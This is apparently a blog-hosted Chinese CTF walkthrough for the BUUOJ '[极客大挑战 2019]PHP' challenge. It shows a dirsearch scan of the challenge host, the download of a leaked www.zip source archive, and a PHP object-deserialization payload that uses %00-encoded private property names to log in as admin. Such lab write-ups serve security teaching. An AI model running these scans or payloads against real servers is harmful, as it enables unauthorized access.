[极客大挑战 2019]PHP1

worker..2024-08-02 22:30

打开题目

游戏界面

猜测php里面有文件,我们可以用dirsearch 扫描一下这个服务器

执行命令

dirsearch -u http://2999dfd5-1d43-4a81-a088-9e41c9dccab4.node4.buuoj.cn/ -e php > test.log

最后在log文件中找到一个 200 www.zip

浏览器输入payload下载下来

得到目录文件

解读一下php代码,进行反序列化

payload

?select=O:4:"Name":3:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}

但是发现这个里面有空格,所以把空格url编码变成%00再传参

Payload:

/?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

相关推荐
许三多20202 小时前
Android studio Could not move temporary workspace
android·ide·android studio·workspace
王江奎3 小时前
FFmpeg中使用Android Content协议打开文件设备
android·ffmpeg
清霜之辰3 小时前
安卓开发用到的设计模式(1)创建型模式
android·设计模式·创建型模式
隐-梵4 小时前
面向GIS的Android studio移动开发(二)--在地图上绘制电子围栏
android·ide·android studio
末央&4 小时前
【Linux】进程状态
android·linux·运维
luyou1125 小时前
雷电模拟器去除广告绿色版电脑安卓模拟器 电脑上使用安卓系统软件游戏 v9.1.45.1
android·游戏·电脑
楠目6 小时前
网络安全--PHP第一天
android·web安全·php
追随远方6 小时前
网络框架二次封装:基于Kotlin的高扩展性网络请求框架完整实现
android·网络·okhttp·kotlin
元亓亓亓7 小时前
MySQL--day5--多表查询
android·数据库·mysql
androidwork18 小时前
Kotlin与机器学习实战:Android端集成TensorFlow Lite全指南
android·机器学习·kotlin·tensorflow
热门推荐
01从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑02KGG转MP3工具|非KGM文件|解密音频03YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】04【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!05组基轨迹建模 GBTM的介绍与实现(Stata 或 R)06DeepSeek各版本说明与优缺点分析07VMware虚拟机安装Win7专业版保姆级教程(附镜像包)08YOLOv5改进 | 添加CA注意力机制 + 增加预测层 + 更换损失函数之GIoU09Coze扣子平台完整体验和实践(附国内和国际版对比)10Windows下Qt5.14.2连接华为IoTDA平台